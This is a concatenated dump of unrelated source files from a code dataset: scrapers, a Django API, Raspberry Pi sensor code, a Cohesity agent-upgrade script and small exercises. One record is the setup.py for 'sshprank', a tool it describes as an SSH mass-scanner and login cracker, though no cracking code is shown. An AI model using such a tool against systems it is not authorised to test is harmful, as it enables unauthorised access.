**args)\n","sub_path":"insights/parsers/sctp.py","file_name":"sctp.py","file_ext":"py","file_size_in_byte":5036,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"487179771","text":"from Child import Child\nfrom Node import Node  # noqa: I201\n\n# These nodes are used only in code completion.\n\nCOMPLETIONONLY_NODES = [\n    # Expression.\n    Node('CodeCompletionExpr', kind='Expr',\n         children=[\n             Child('Base', kind='Expr', is_optional=True),\n             Child('PeriodOrParen', kind='Token',\n                   token_choices=[\n                       'PeriodToken',\n                       'PrefixPeriodToken',\n                       'LeftParenToken',\n                   ],\n                   is_optional=True),\n             Child('CodeCompletionToken', kind='Token'),\n         ]),\n\n    # Type.\n    Node('CodeCompletionType', kind='Type',\n         children=[\n             Child('Base', kind='Type', is_optional=True),\n             Child('Period', kind='Token',\n                   token_choices=[\n                       'PeriodToken',\n                       'PrefixPeriodToken',\n                   ],\n                   is_optional=True),\n             Child('CodeCompletionToken', kind='Token'),\n         ]),\n]\n","sub_path":"utils/gyb_syntax_support/CompletionOnlyNodes.py","file_name":"CompletionOnlyNodes.py","file_ext":"py","file_size_in_byte":1042,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"119135753","text":"from IPython.core.interactiveshell import InteractiveShell\nInteractiveShell.ast_node_interactivity = 'all'\nimport traceback\nimport json\nfrom mymodule import stats_word\n\nwith open(r'H:\\【自学Python】\\GitHub\\selfteaching-python-camp\\exercises\\1901010109\\d09\\tang300.json', 'rb') as f:\n    text = f.read()\n    text_str = text.decode( encoding='utf-8' )\n    try:\n        print( f\"Top 100 most frequent Chinese characters in the file, in descending order:\" )\n        for key,value in stats_word.stats_text_cn(text_str):\n            print( key, value )\n    except Exception as e:\n        print( traceback.format_exc() )","sub_path":"exercises/1901010109/d09/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":597,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"640727695","text":"import urllib.request\r\nfrom bs4 import BeautifulSoup\r\nimport re\r\n\r\nurl = 'https://news.yahoo.co.jp/topics'\r\nua = 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) '\\\r\n     'AppleWebKit/537.36 (KHTML, like Gecko) '\\\r\n     'Chrome/81.0.4044.138 Safari/537.36 '\r\n\r\ndef getkokunai(word):\r\n    req = urllib.request.Request(url, headers={'User-Agent': ua})\r\n    html = urllib.request.urlopen(req)\r\n    soup = BeautifulSoup(html, \"html.parser\")\r\n    \r\n    topicsindex = soup.find('div', attrs={'class':'sc-jqCOkK gRKalU'})\r\n    topics = topicsindex.find_all(\"li\")\r\n    knlist = []\r\n\r\n    for topic in topics:\r\n        knlist.append(topic.find('a').contents[0].string)\r\n        knlist.append(topic.find('a').attrs['href'])\r\n    \r\n    knlist = re.sub(r'(([^,]*,){1})', r'\\1\\n', str(knlist)) \r\n    return knlist\r\n\r\n    # print(trend.find('a').contents[2].string)\r\n    # print(\"https://search.yahoo.co.jp\" + trend.find('a').attrs['href'])\r\n    ","sub_path":"kokunai.py","file_name":"kokunai.py","file_ext":"py","file_size_in_byte":933,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"126102556","text":"\n\n# class header\nclass _YOLK():\n\tdef __init__(self,): \n\t\tself.name = \"YOLK\"\n\t\tself.definitions = [u'the yellow, middle part of an egg: ']\n\n\t\tself.parents = []\n\t\tself.childen = []\n\t\tself.properties = []\n\t\tself.jsondata = {}\n\n\n\t\tself.specie = 'nouns'\n\n\n\tdef run(self, obj1 = [], obj2 = []):\n\t\treturn 
self.jsondata\n","sub_path":"xai/brain/wordbase/nouns/_yolk.py","file_name":"_yolk.py","file_ext":"py","file_size_in_byte":311,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"150152073","text":"from .models import Datamatrix, Session\nfrom rest_framework.response import Response\nfrom rest_framework.views import APIView\nfrom django.shortcuts import render\nfrom bs4 import BeautifulSoup\nimport requests\nimport uuid\n\nWEBHOOK_KEY = 'test_key'\n\nclass ImageWorker(APIView):\n\n    def get(self, request):\n        r = request.GET\n        text = r.get('text')\n        session_uuid = r.get('session_id')\n        last = r.get('last')\n        print(str(request))\n\n        if text and session_uuid and (not last):\n            s = Session.objects.get(uuid=session_uuid)\n            DM = Datamatrix(text=text,session_id=s)\n            DM.make_datamatrix()\n            return Response({\"ok\": 'ok'})\n        if last:\n            s = Session.objects.get(uuid=session_uuid)\n            DM = Datamatrix(text=text,session_id=s)\n            DM.make_datamatrix()\n            DM.make_zipfile()\n            return Response({\"data\": {'session':s.uuid, 'zip': DM.zip_path}})\n\n\nclass SessionGenerator(APIView):\n\n    def get(self,request):\n        r = request.GET\n        if (r.get('new_session') and (r.get('token') == WEBHOOK_KEY)):\n            s = Session()\n            s.uuid = str(uuid.uuid4())\n            s.save()\n            return Response({\"session_id\": s.uuid})\n        else:\n            return Response({\"error\": 'invalid_request'})\n","sub_path":"dm_app/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1322,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"222503953","text":"# Write a program that reads any integer and asks\n# the user to choose the conversion base:\n# - 1 for binary\n# - 2 for octal\n# - 3 for hexadecimal\n\nnum = int(input('Enter an integer: '))\n\nprint('''Choose a base for conversion:\n[1] Convert to binary\n[2] Convert to octal\n[3] Convert to hexadecimal''')\n\nopção = int(input('Enter your option: '))\n\nif opção == 1:\n    print('{} in binary is {}.'.format(num, bin(num)[2:]))\n\nelif opção == 2:\n    print('{} in octal is {}'.format(num, oct(num)[2:]))\n\nelif opção == 3:\n    print('{} in hexadecimal is {}'.format(num, hex(num)[2:]))\n\nelse:\n    print('Enter 1, 2 or 3 to perform a conversion!')\n","sub_path":"ex037.py","file_name":"ex037.py","file_ext":"py","file_size_in_byte":736,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"323917199","text":"#!/usr/bin/python3\n\ndef isprime(n):\n    if n < 2:\n        return False\n    for x in range(2, n):\n        if n % x == 0:\n            return False\n    return True  # only prime if no divisor was found (the misindented else returned True after checking x=2 alone)\n\ndef primes(n = 1):\n    while(True):\t\t# loop forever\n        if isprime(n): yield n  # yield n to the statement calling 'primes', which prints n while n < 100; the function picks back up after the yield, i.e. 
n += 1\n n += 1\n\nfor n in primes():\n if n > 100: break\n print(n)\n\n","sub_path":"eg_generator.py","file_name":"eg_generator.py","file_ext":"py","file_size_in_byte":460,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"307734581","text":"#!/usr/bin/env python\n\"\"\"Upgrade Cohesity Agents Using Python\"\"\"\n\n### usage: ./upgradeAgents.py -v 192.168.1.198 -u admin [-d local]\n\n### import pyhesity wrapper module\nfrom pyhesity import *\nfrom datetime import datetime\nfrom time import sleep\nimport codecs\n\n### command line arguments\nimport argparse\nparser = argparse.ArgumentParser()\nparser.add_argument('-v', '--vip', type=str, default='helios.cohesity.com')\nparser.add_argument('-u', '--username', type=str, default='helios')\nparser.add_argument('-d', '--domain', type=str, default='local')\nparser.add_argument('-c', '--clustername', type=str, action='append')\nparser.add_argument('-mcm', '--mcm', action='store_true')\nparser.add_argument('-i', '--useApiKey', action='store_true')\nparser.add_argument('-pwd', '--password', type=str, default=None)\nparser.add_argument('-np', '--noprompt', action='store_true')\nparser.add_argument('-m', '--mfacode', type=str, default=None)\nparser.add_argument('-o', '--ostype', type=str, default=None)\nparser.add_argument('-x', '--execute', action='store_true')\nparser.add_argument('-s', '--showcurrent', action='store_true')\nparser.add_argument('-n', '--agentname', action='append', type=str)\nparser.add_argument('-l', '--agentlist', type=str)\nparser.add_argument('-k', '--skipwarnings', action='store_true')\nparser.add_argument('-r', '--refresh', action='store_true')\nparser.add_argument('-rt', '--timeout', type=int, default=35)\nparser.add_argument('-w', '--sleeptime', type=int, default=60)\nparser.add_argument('-t', '--throttle', type=int, default=12)\n\nargs = parser.parse_args()\n\nvip = args.vip\nusername = args.username\ndomain = args.domain\nclusternames = args.clustername\nmcm = args.mcm\nuseApiKey = args.useApiKey\npassword = args.password\nnoprompt = args.noprompt\nmfacode = args.mfacode\nostype = args.ostype\nshowcurrent = args.showcurrent\nexecute = args.execute\nagentnames = args.agentname\nagentlist = args.agentlist\nskipwarnings = args.skipwarnings\nrefresh = args.refresh\ntimeout = args.timeout\nsleeptime = args.sleeptime\nthrottle = args.throttle\n\n\n# gather server list\ndef gatherList(param=None, filename=None, name='items', required=True):\n items = []\n if param is not None:\n for item in param:\n items.append(item)\n if filename is not None:\n f = open(filename, 'r')\n items += [s.strip() for s in f.readlines() if s.strip() != '']\n f.close()\n if required is True and len(items) == 0:\n print('no %s specified' % name)\n exit()\n return items\n\n\nagentnames = gatherList(agentnames, agentlist, name='agents', required=False)\n\n# authenticate\napiauth(vip=vip, username=username, domain=domain, password=password, useApiKey=useApiKey, helios=mcm, prompt=(not noprompt), mfaCode=mfacode)\n\n# exit if not authenticated\nif apiconnected() is False:\n print('authentication failed')\n exit(1)\n\nnow = datetime.now()\ndateString = now.strftime(\"%Y-%m-%d-%H-%M-%S\")\n\nif mcm or vip.lower() == 'helios.cohesity.com':\n outfile = 'agentUpgrades-helios-%s.csv' % dateString\n if clusternames is None or len(clusternames) == 0:\n clusternames = [c['name'] for c in heliosClusters()]\nelse:\n cluster = api('get', 'cluster')\n clusternames = [cluster['name']]\n cluster = api('get', 
'cluster')\n    outfile = 'agentUpgrades-%s-%s.csv' % (cluster['name'], dateString)\n\nf = codecs.open(outfile, 'w')\nf.write('Cluster Name,Cluster Version,Agent Name,Agent Version,OS Type,OS Name,Status,Error Message\\n')\n\nreportNextSteps = False\n\nfor clustername in clusternames:\n    print('\\nConnecting to %s...\\n' % clustername)\n    if mcm or vip.lower() == 'helios.cohesity.com':\n        heliosCluster(clustername)\n\n    cluster = api('get', 'cluster')\n\n    ### get Physical Servers\n    nodes = api('get', 'protectionSources/registrationInfo?environments=kPhysical&environments=kHyperV&allUnderHierarchy=true')\n    nodesCounted = 0\n    if refresh is True:\n        if nodes is not None and 'rootNodes' in nodes and nodes['rootNodes'] is not None:\n            for node in nodes['rootNodes']:\n                if 'physicalProtectionSource' in node['rootNode']:\n                    paramkey = node['rootNode']['physicalProtectionSource']\n                    hostType = paramkey['hostType'][1:]\n                    osName = node['rootNode']['physicalProtectionSource']['osName']\n                if 'hypervProtectionSource' in node['rootNode']:\n                    paramkey = node['rootNode']['hypervProtectionSource']\n                    osName = 'HyperV'\n                    hostType = 'Windows'\n                name = node['rootNode']['name']\n                hostType = 'unknown'\n                errorMessage = ''\n                tenant = ''\n                if 'entityPermissionInfo' in node['rootNode']:\n                    if 'tenant' in node['rootNode']['entityPermissionInfo']:\n                        if 'name' in node['rootNode']['entityPermissionInfo']['tenant']:\n                            tenant = node['rootNode']['entityPermissionInfo']['tenant']['name']\n                try:\n                    if 'authenticationErrorMessage' in node['registrationInfo'] and node['registrationInfo']['authenticationErrorMessage'] is not None:\n                        errorMessage = node['registrationInfo']['authenticationErrorMessage'].split(',')[0].split('\\n')[0]\n                    if 'refreshErrorMessage' in node['registrationInfo'] and node['registrationInfo']['refreshErrorMessage'] is not None and node['registrationInfo']['refreshErrorMessage'] != '':\n                        errorMessage = node['registrationInfo']['refreshErrorMessage'].split(',')[0].split('\\n')[0]\n                except Exception:\n                    pass\n                try:\n                    hostType = paramkey['hostType'][1:]\n                except Exception:\n                    pass\n                if len(agentnames) == 0 or name.lower() in [a.lower() for a in agentnames]:\n                    if ostype is None or ostype.lower() == hostType.lower():\n                        if errorMessage == '' or skipwarnings is False:\n                            print('  Refreshing %s' % name)\n                            if tenant != '':\n                                impersonate(tenant)\n                            result = api('post', 'protectionSources/refresh/%s' % node['rootNode']['id'])  # , timeout=timeout, quiet=True)\n                            if tenant != '':\n                                switchback()\n    nodes = api('get', 'protectionSources/registrationInfo?environments=kPhysical&environments=kHyperV&allUnderHierarchy=true')\n    print('')\n\n    if nodes is not None and 'rootNodes' in nodes and nodes['rootNodes'] is not None:\n        for node in nodes['rootNodes']:\n            tenant = ''\n            agentIds = []  # list of agents to upgrade\n            name = node['rootNode']['name']\n            version = 'unknown'\n            hostType = 'unknown'\n            osName = 'unknown'\n            status = 'unknown'\n            errorMessage = ''\n            errors = ''\n            if 'physicalProtectionSource' in node['rootNode']:\n                paramkey = node['rootNode']['physicalProtectionSource']\n                hostType = paramkey['hostType'][1:]\n                osName = node['rootNode']['physicalProtectionSource']['osName']\n            if 'hypervProtectionSource' in node['rootNode']:\n                paramkey = node['rootNode']['hypervProtectionSource']\n                osName = 'HyperV'\n                hostType = 'Windows'\n                try:\n                    thisSource = api('get', 'protectionSources?id=%s' % node['rootNode']['id'])\n                    if thisSource is not None and len(thisSource) > 0:\n                        if 'nodes' in thisSource[0] and thisSource[0]['nodes'] is not None and len(thisSource[0]['nodes']) > 
0:\n                            for thisNode in thisSource[0]['nodes']:\n                                if thisNode['protectionSource']['hypervProtectionSource']['type'] in ['kHostGroup', 'kHostCluster', 'kHypervHost']:\n                                    if 'nodes' in thisNode:\n                                        nodes['rootNodes'].append({\n                                            'rootNode': thisNode['protectionSource'],\n                                            'nodes': thisNode['nodes']\n                                        })\n                                    else:\n                                        nodes['rootNodes'].append({\n                                            'rootNode': thisNode['protectionSource'],\n                                        })\n                except Exception:\n                    pass\n            if 'entityPermissionInfo' in node['rootNode']:\n                if 'tenant' in node['rootNode']['entityPermissionInfo']:\n                    if 'name' in node['rootNode']['entityPermissionInfo']['tenant']:\n                        tenant = node['rootNode']['entityPermissionInfo']['tenant']['name']\n            try:\n                if 'authenticationErrorMessage' in node['registrationInfo'] and node['registrationInfo']['authenticationErrorMessage'] is not None:\n                    errorMessage = node['registrationInfo']['authenticationErrorMessage'].split(',')[0].split('\\n')[0]\n                if 'refreshErrorMessage' in node['registrationInfo'] and node['registrationInfo']['refreshErrorMessage'] is not None and node['registrationInfo']['refreshErrorMessage'] != '':\n                    errorMessage = node['registrationInfo']['refreshErrorMessage'].split(',')[0].split('\\n')[0]\n            except Exception:\n                pass\n            if len(agentnames) == 0 or name.lower() in [a.lower() for a in agentnames]:\n                if 'agents' in paramkey and paramkey['agents'] is not None and len(paramkey['agents']) > 0:\n                    for agent in paramkey['agents']:\n                        if 'version' in agent:\n                            version = agent['version']\n                            if 'upgradability' in agent and agent['upgradability'] is not None:\n                                if agent['upgradability'] == 'kUpgradable':\n                                    status = 'upgradable'\n                                    agentIds.append(agent['id'])\n                                else:\n                                    status = 'current'\n                            break\n                if ostype is None or ostype.lower() == hostType.lower():\n                    if len(agentIds) > 0:\n                        if errorMessage != '':\n                            errors = '(warning: registration/refresh errors)'\n                        if skipwarnings is not True or errors == '':\n                            if execute is True:\n                                status = 'upgrading'\n                                print('  %s (%s): upgrading ... 
%s' % (name, hostType, errors))\n thisUpgrade = {'agentIds': agentIds}\n if tenant != '':\n impersonate(tenant)\n result = api('post', 'physicalAgents/upgrade', thisUpgrade)\n nodesCounted += 1\n if nodesCounted % throttle == 0:\n print(' sleeping for %s seconds' % sleeptime)\n sleep(sleeptime)\n if tenant != '':\n switchback()\n else:\n print(' %s (%s): %s *** %s' % (name, hostType, status, errors))\n reportNextSteps = True\n else:\n if showcurrent is True or name.lower() in [a.lower() for a in agentnames]:\n if 'agents' in paramkey:\n print(' %s (%s): %s %s' % (name, hostType, status, errors))\n f.write('%s,%s,%s,%s,%s,%s,%s,%s\\n' % (cluster['name'], cluster['clusterSoftwareVersion'], name, version, hostType, osName, status, errorMessage))\n\nif reportNextSteps is True:\n print('\\nTo perform the upgrades, rerun the script with the -x (--execute) switch')\n\nf.close()\nprint('\\nOutput saved to %s\\n' % outfile)\n","sub_path":"python/upgradeAgents/upgradeAgents.py","file_name":"upgradeAgents.py","file_ext":"py","file_size_in_byte":12253,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"476028072","text":"\"\"\"Set up sshprank.\"\"\"\nimport os\n\nfrom setuptools import find_packages, setup\n\nhere = os.path.abspath(os.path.dirname(__file__))\n\nwith open(os.path.join(here, \"README.md\"), encoding=\"utf-8\") as readme:\n long_description = readme.read()\n\n\nsetup(\n name=\"sshprank\",\n version=\"1.2.3\",\n description=\"SSH mass-scanner, login cracker and banner grabber tool\",\n long_description=long_description,\n long_description_content_type='text/markdown',\n url=\"https://github.com/noptrix/sshprank\",\n author=\"noptrix\",\n author_email=\"noptrix@nullsecurity.net\",\n maintainer=\"Fabian Affolter\",\n maintainer_email=\"fabian@affolter-engineering.ch\",\n license=\"MIT\",\n install_requires=[\"paramiko\", \"shodan\", \"python-masscan\"],\n packages=find_packages(),\n zip_safe=True,\n include_package_data=True,\n entry_points={\"console_scripts\": [\" sshprank=sshprank:main\"]},\n keywords=\"ssh scanner login cracker\",\n classifiers=[\n \"Development Status :: 3 - Alpha\",\n \"Environment :: Console\",\n \"Intended Audience :: Developers\",\n \"License :: OSI Approved :: MIT License\",\n \"Operating System :: MacOS :: MacOS X\",\n \"Operating System :: Microsoft :: Windows\",\n \"Operating System :: POSIX\",\n \"Programming Language :: Python :: 3.8\",\n \"Programming Language :: Python :: 3.9\",\n \"Topic :: Utilities\",\n ],\n)\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1391,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"468590108","text":"#Definition for a binary tree node.\nclass TreeNode(object):\n def __init__(self, x):\n self.val = x\n self.left = None\n self.right = None\n\nclass Solution(object):\n def invertTree(self, root):\n \"\"\"\n :type root: TreeNode\n :rtype: TreeNode\n \"\"\"\n\n if not root:\n return None\n temp = self.invertTree(root.left)\n root.left = self.invertTree(root.right)\n root.right = temp\n if root.left:\n print('left of ' + str(root.val) + ' is ' + str(root.left.val))\n print('right of ' + str(root.val) + ' is ' + str(root.right.val))\n return root\n\nclass Tests(object):\n def testOne(self):\n a = TreeNode(4)\n b = TreeNode(2)\n c = TreeNode(7)\n a.left = b\n a.right = c\n d = TreeNode(1)\n e = TreeNode(3)\n b.left = d\n b.right = e\n f = TreeNode(6)\n g = TreeNode(9)\n c.left = f\n c.right = 
g\n\n        s = Solution()\n        s.invertTree(a)\n\nif __name__ == '__main__':\n    # begin\n    t = Tests()\n    t.testOne()\n\n\n\n\n\n","sub_path":"Leetcode-Python/226-Invert-Binary-Tree.py","file_name":"226-Invert-Binary-Tree.py","file_ext":"py","file_size_in_byte":1111,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"287426738","text":"import Data_logger as dl\nimport os.path\nimport pytest\nimport RPi.GPIO as gpio\nimport os\n\n#it will always be a positive number as North/South and East/West\ndef test_gps_format():\n\t# 5224.9671 (DDMM.MMMM) 52 + 24.9671/60\n\t# format will always be 8 digits\n\texpected = format(52 + 24.9671/60,'.5f')\n\tassert expected == dl.change_format_of_GPS(5224.9671)\n\texpected = format(00 + 00.0000/60,'.5f')\n\tassert expected == dl.change_format_of_GPS(0000.0000)\n#test setting up the directory\ndef test_set_up_dir():\n\t#file and directory should be created\n\tfile = dl.set_up_dir()\n\t#check it exists\n\tresult = os.path.isfile(file)\n\t#remove it\n\tos.remove(file)\n\t#check result before the file was removed\n\tassert result\n\n#test check_previous_file function\ndef test_check_previous_file():\n\t#create file\n\tfile = dl.set_up_dir()\n\t#check it exists\n\tassert os.path.isfile(file)\n\t#run method\n\tdl.check_previous_files()\n\t#check filename has been replaced\n\tresult = os.path.isfile(file.replace('~',''))\n\t#remove file\n\tos.remove(file.replace('~',''))\n\t#test result\n\tassert result\n\n#test i2c functions\ndef test_i2c():\n\t#set board mode\n\tgpio.setmode(gpio.BCM)\n\tgpio.setup(24,gpio.OUT)\n\t#setup i2c\n\tpi, handle = dl.set_up_i2c()\n\t#get message from device\n\tair_quality_message = dl.get_air_quality_data(pi,handle)\n\t#check message length\n\tassert len(air_quality_message) == 9\n\t#check the air quality sensor is in ready mode\n\tassert air_quality_message[2] == 0x00\n\t#databytes will never be negative (0 at the least)\n\t#test conversion\n\tco2 , toc = dl.translate_air_data([0,0,0,0,0,0,0,0,0])\n\tassert co2 == 0\n\tassert toc == 0\n\tco2 , toc = dl.translate_air_data([99,99,99,99,99,99,99,99,99])\n\tassert co2 == 25443\n\tassert toc == 25443\n\tco2 , toc = dl.translate_air_data([99,0,0,0,0,0,0,5,7])\n\tassert co2 == 25344\n\tassert toc == 1287\n#test UART functions\ndef test_serial():\n\t#set board mode\n\tgpio.setmode(gpio.BCM)\n\tgpio.setup(24,gpio.OUT)\n\t#set up serial\n\tserial = dl.set_up_serial()\n\t#check connection has been made\n\tassert serial.is_open\n\t#test if message has been received\n\tmessage = dl.get_and_translate_gpgga(serial)\n\n\tassert message.get(\"position_fix_indicator\") == '1'\n\n#test logging function\ndef test_start_logging():\n\t#create file\n\tfile_path = dl.set_up_dir()\n\t#open the file - in append mode\n\tfile = open(file_path,'a')\n\t#set board mode\n\tgpio.setmode(gpio.BCM)\n\tgpio.setup(24,gpio.OUT)\n\t#set up serial\n\tserial = dl.set_up_serial()\n\t#set up i2c\n\tpi, handle = dl.set_up_i2c()\n\t#run logging method once\n\tdl.start_logging(file, serial,pi,handle)\n\t#close file\n\tfile.close()\n\t#test how many lines are written (should be 2)\n\t#headings and a data line\n\twith open(file_path) as f:\n\t\tlines = sum(1 for _ in f)\n\t#os.remove(file_path)\n\tprint(file_path)\n\tassert 2 == lines\n\t","sub_path":"Src/Monitoring/Data_logger_test.py","file_name":"Data_logger_test.py","file_ext":"py","file_size_in_byte":2732,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} 
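Two of the snippets in this section test strings by identity rather than by value: the GPS fix check in Data_logger_test.py above was written as `message.get("position_fix_indicator") is '1'`, and asknames.py further down uses `if string is not 'NA':`. `is` compares object identity, not contents, and only appears to work because CPython interns some short literals; a string built at runtime (from I/O, `join`, slicing) can be equal but not identical. The following standalone sketch (the helper names are illustrative only, not part of the dataset) shows the failure mode and the correct form:

# Identity (`is`) asks "same object?"; equality (`==`) asks "same characters?".
na_literal = 'NA'
built = ''.join(['N', 'A'])  # same characters, freshly allocated object

print(built == na_literal)   # True  -- value equality, always reliable
print(built is na_literal)   # usually False -- identity here is an accident

# Robust versions of the checks used in the snippets:
def fix_ok(indicator):
    return indicator == '1'   # not: indicator is '1'

def has_result(answer):
    return answer != 'NA'     # not: answer is not 'NA'

assert fix_ok('1') and has_result('x') and not has_result(built)

Python 3.8+ flags the literal form with a SyntaxWarning ("is" with a literal), which is a good hint that `==`/`!=` was intended.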
+{"seq_id":"261931868","text":"import time\nimport RPi.GPIO as GPIO\n\nGPIO.setmode(GPIO.BCM)\n\nPOWER_PIN = 21\nSPICLK = 18\nSPIMISO = 23\nSPIMOSI = 24\nSPICS = 25\n\nPAUSE = 0.1\n\n# read SPI data from MCP3008 chip, 8 possible adc's (0 thru 7)\ndef readadc(adcnum, clockpin, mosipin, misopin, cspin):\n if ((adcnum > 7) or (adcnum < 0)):\n return -1\n GPIO.output(cspin, True)\n\n GPIO.output(clockpin, False) # start clock low\n GPIO.output(cspin, False) # bring CS low\n\n commandout = adcnum\n commandout |= 0x18 # start bit + single-ended bit\n commandout <<= 3 # we only need to send 5 bits here\n for i in range(5):\n if (commandout & 0x80):\n GPIO.output(mosipin, True)\n else:\n GPIO.output(mosipin, False)\n commandout <<= 1\n GPIO.output(clockpin, True)\n GPIO.output(clockpin, False)\n\n adcout = 0\n # read in one empty bit, one null bit and 10 ADC bits\n for i in range(12):\n GPIO.output(clockpin, True)\n GPIO.output(clockpin, False)\n adcout <<= 1\n if (GPIO.input(misopin)):\n adcout |= 0x1\n\n GPIO.output(cspin, True)\n\n adcout >>= 1 # first bit is 'null' so drop it\n return adcout\n\n\ndef spi_setup():\n GPIO.setup(SPIMOSI, GPIO.OUT)\n GPIO.setup(SPIMISO, GPIO.IN)\n GPIO.setup(SPICLK, GPIO.OUT)\n GPIO.setup(SPICS, GPIO.OUT)\n GPIO.setup(POWER_PIN, GPIO.OUT)\n\n\ndef spi_readout(adc_pin):\n # read the analog pin\n return readadc(adc_pin, SPICLK, SPIMOSI, SPIMISO, SPICS)\n\n\ndef power_on():\n\n GPIO.output(POWER_PIN, True)\n\n\ndef power_off():\n GPIO.output(POWER_PIN, False)\n\n\ndef adc_to_temp(readout):\n millivolts = readout * (3300.0 / 1024.0)\n temp_c = ((millivolts - 100.0) / 10.0) - 40.0\n return temp_c\n\nif __name__ == \"__main__\":\n HYGROMETER = 0\n TEMP = 1\n LIGHT = 2\n spi_setup()\n power_on()\n time.sleep(PAUSE)\n print(\"Hygrometer value %d\" % spi_readout(HYGROMETER))\n power_off()\n time.sleep(PAUSE)\n temp = adc_to_temp(spi_readout(TEMP))\n print(\"Temp sensor: %.1f C\" % temp)\n time.sleep(PAUSE)\n light_level = (float(spi_readout(LIGHT))/1024.0) * 100.0\n print(\"Light level {}% \".format(light_level))\n GPIO.cleanup()\n","sub_path":"source/0004_light_temp_moisture.py","file_name":"0004_light_temp_moisture.py","file_ext":"py","file_size_in_byte":2366,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"404642979","text":"from functools import partial\nfrom typing import Callable\n\nimport pygame\n\nfrom input_data import InputParser\nfrom main_game import Game\nfrom rounds import Round\nfrom setup_environment import SetupEnvironment\nfrom text_surface_rectangle import Colors, TextRec\n\n\nclass MenuPage:\n menu_txt = \"Menu Page\"\n sc_button_txt = \"Science quiz\"\n math_button_txt = \"Math quiz\"\n\n def _create_menu_button_settings(self):\n list_of_buttons = list()\n for text in [self.sc_button_txt, self.math_button_txt]:\n button = self.default_surface_settings.copy()\n button.update(\n {\"text\": text, \"y\": self.setup.req_height, \"x\": self.setup.padding}\n )\n list_of_buttons.append(button)\n return list_of_buttons\n\n def __init__(self, setup: Callable):\n # For menu buttons box number should be 3\n self.setup = setup(box_number=3)\n self.default_surface_settings = {\n \"x\": None,\n \"y\": None,\n \"color\": Colors.color_green,\n \"font_size\": 100,\n \"font_name\": \"arial\",\n \"text\": \"\",\n }\n\n # Menu button and menu title surface settings\n self.title_surface_settings = self.default_surface_settings.copy()\n self.title_surface_settings.update(\n {\n \"x\": self.setup.padding,\n \"y\": 
self.setup.req_question_y,\n \"color\": Colors.color_light_yellow,\n \"text\": self.menu_txt,\n }\n )\n\n self.menu_button_setting_list = self._create_menu_button_settings()\n self.all_surfaces_settings = [\n self.title_surface_settings\n ] + self.menu_button_setting_list\n\n self.title_surface, *self.button_surfaces = self.setup.create_text_boxes(\n TextRec, self.all_surfaces_settings\n )\n\n def draw(self, display):\n self.title_surface.draw(display)\n for button in self.button_surfaces:\n button.draw(display)\n\n def _event_button_pressed(self, event):\n for button in self.button_surfaces:\n if button.rect.collidepoint(*event.pos):\n return button\n return None\n\n def _check_button_text(self, button):\n if not button:\n return False\n return button.text == self.sc_button_txt\n\n def change_button_color(self, button, color, display):\n button.rect_surf.fill(color)\n button.draw(display)\n pygame.display.flip()\n\n def check_selected_field(self, event):\n button = self._event_button_pressed(event)\n if self._check_button_text(button):\n return button\n\n def loop(self, display, game, round_list):\n done = True\n while done:\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n done = False\n\n elif event.type == pygame.MOUSEBUTTONUP:\n pressed = self.check_selected_field(event)\n\n if pressed:\n self.change_button_color(pressed, Colors.color_blue, display)\n pygame.time.delay(200)\n game.main_loop(round_list)\n self.change_button_color(pressed, Colors.color_green, display)\n\n display.fill(Colors.color_light_yellow)\n self.draw(display)\n pygame.display.flip()\n\n pygame.quit()\n\n\nif __name__ == \"__main__\":\n parser = InputParser(text_file=\"INPUT_natural_science.txt\")\n data = parser.store_data()\n\n game_ = Game(win_w=800, win_h=800)\n setup_ = partial(SetupEnvironment, win_width=game_.width, win_height=game_.height)\n menu_ = MenuPage(setup=setup_)\n round_lst = [Round(setup=setup_, question=q, answer=a) for q, a in data]\n menu_.loop(game_.display, game_, round_lst)\n","sub_path":"menu_page.py","file_name":"menu_page.py","file_ext":"py","file_size_in_byte":3853,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"21755726","text":"# -*- tab-width: 4; indent-tabs-mode: nil; py-indent-offset: 4 -*-\n# Helper classes for working with Boost.Unordered.\n#\n# This file is part of boost-gdb-printers.\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation; either version 3 of the License, or\n# (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program. 
